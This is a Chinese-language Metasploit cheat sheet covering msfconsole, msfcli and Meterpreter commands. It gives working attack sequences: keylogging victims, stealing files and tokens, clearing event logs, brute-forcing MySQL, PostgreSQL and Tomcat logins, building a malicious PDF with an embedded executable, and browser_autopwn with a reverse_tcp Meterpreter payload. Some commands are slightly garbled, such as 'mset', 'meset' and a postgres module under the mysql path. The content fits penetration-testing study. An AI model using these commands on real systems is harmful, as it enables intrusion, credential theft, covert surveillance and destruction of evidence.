msfconsole的命令:
msfconsole use module :这个命令允许你开始配置所选择的模块。 set optionname module :这个命令允许你为指定的模块配置不同的选项。 exploit :这个命令启动漏洞利用模块 run :这个命令启动非漏洞利用模块。 search module :这个命令允许你搜索独立模块。 help exitmsfcli的命令:
msfcli msfcli [PATH TO EXPLOIT] [options = value] :这是执行漏洞利用的语法。 msf -hMeterpreter 执行实际的载荷分发和漏洞利用工作:
background :这个命令允许你在后台运行 Meterpreter 会话。这个命令也能为你带回MSF 提示符。 download :这个命令允许你从受害者机器中下载文件。 upload :这个命令允许你向受害者机器上传文件。 execute :这个命令允许你在受害者机器上运行命令。 shell :这个命令允许你在受害者机器上运行 Windows shell 提示符( 仅限于 Windows主机) 。 session -i :这个命令允许你在会话之间切换。开始记录目标系统中用户的击键顺序:
keyscan_start转储目标系统中用户的击键顺序。击键顺序会显示在屏幕上:
keyscan_dump停止记录目标系统中用户的击键顺序。
keyscan_stop删除目标系统中的文件。
del exploited.docx清除目标系统中的事件日志。
clearav展示运行进程的列表。
ps杀掉受害者系统的指定进程,使用 kill [pid] 语法。
kill 6353尝试偷取目标系统上的模拟令牌。
steal_tokenmsfconsole mysql
use auxiliary/scanner/mysql/mysql_login show options set RHOST 192.168.10.111 set user_file /root/Desktop/usernames.txt set pass_file /root/Desktop/passwords.txt exploitmsfconsole postgresql
use auxiliary/scanner/mysql/postgres_login show options set RHOST 192.168.10.111 set user_file /root/Desktop/usernames.txt set pass_file /root/Desktop/passwords.txt exploitmsfconsole tomcat
use auxiliary/scanner/http/tomcat_mgr_login show options PASS_FILE meset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt USER_FILE mset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt set RHOSTS 192.168.10.111 set RPORT 8180 exploitmsfconsole
msfconsole pdf use exploit/windows/fileformat/adobe_pdf_embedded_exe show options set FILENAME evildocument.pdf set INFILENAME /root/Desktop/willie.pdf exploit实现 browser_autopwn:
浏览器 Autopwn 是 Metasploit 提供的辅助模块,在受害者访问网页时,让你能够自动化对它 们的攻击。浏览器 Autopwn 在攻击之前指定客户端的指纹识别,也就是说他不会对 IE 7 尝试 利用 Firefox 的漏洞。基于它的浏览器判断,它决定最适于实施哪个漏洞利用。 msfconsole autopwn use auxiliary/server/browser_autopwn set payload windows/meterpreter/reverse_tcp set LHOST 192.168.10.109 set URIPATH "filetypes" exploit Metasploit 会在 IP 地址 < IP Address]:8080> 处执行漏洞利用。 当访问者访问这个地址时, browser_autopwn 模块尝试连接用户的机器来建立远程会话。 如果成功的话,Meterpreter 会确认这个会话。使用会话命令来激活它: session –I 1